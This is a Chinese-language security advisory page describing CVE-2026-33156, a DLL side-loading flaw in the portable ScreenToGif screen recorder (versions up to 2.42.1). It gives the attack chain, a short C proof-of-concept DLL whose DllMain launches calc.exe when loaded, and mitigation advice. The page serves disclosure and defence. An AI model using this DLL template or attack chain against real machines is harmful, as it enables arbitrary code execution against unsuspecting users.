CVE-2026-33156 CVSS 7.8 高危

CVE-2026-33156 ScreenToGif DLL侧载漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33156

漏洞类型

DLL侧载

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

ScreenToGif

漏洞概述

ScreenToGif是一款屏幕录制工具。在2.42.1及之前的版本中，该软件存在DLL侧载漏洞。当便携版可执行文件在用户可写目录下运行时，程序会从应用程序目录而非Windows System32目录加载version.dll。攻击者可利用此缺陷在用户上下文中执行任意代码。由于ScreenToGif主要作为便携式应用分发，且发布时暂无补丁，该漏洞影响较大。

技术细节

该漏洞利用了Windows动态链接库（DLL）的搜索顺序特性。ScreenToGif在启动时会尝试加载version.dll。如果应用程序位于用户具有写入权限的目录（如下载文件夹或桌面），攻击者可以将同名的恶意DLL文件放置在该目录下。根据DLL搜索路径规则，应用程序会优先加载当前工作目录下的DLL，而不是系统目录（System32）下的合法版本。一旦恶意DLL被加载并执行，攻击者即可在当前用户的权限下执行任意代码，绕过部分安全限制。

攻击链分析

STEP 1

步骤1

攻击者获得对ScreenToGif运行目录的写入权限。

STEP 2

步骤2

攻击者在目录中放置恶意的version.dll文件。

STEP 3

步骤3

受害者在该目录下运行ScreenToGif程序。

STEP 4

步骤4

ScreenToGif加载恶意的version.dll而非系统DLL。

STEP 5

步骤5

恶意代码在受害者用户上下文中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>
#include <stdlib.h>

// Entry point for the malicious DLL
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Code to run when the DLL is loaded by the process
        // Example: Execute calc.exe to demonstrate arbitrary code execution
        system("calc.exe");
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Export functions to match the expected exports of version.dll
// Note: Actual exports may need to match the target's dependency exactly.
// This is a simplified PoC structure.

影响范围

ScreenToGif <= 2.42.1

防御指南

临时缓解措施

目前尚无官方补丁。建议用户将ScreenToGif放置在受保护的目录中运行（非用户可写目录），或者修改文件夹权限以防止未授权写入。对于便携版使用场景，请确保运行环境的安全性，避免从不明来源下载便携版软件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表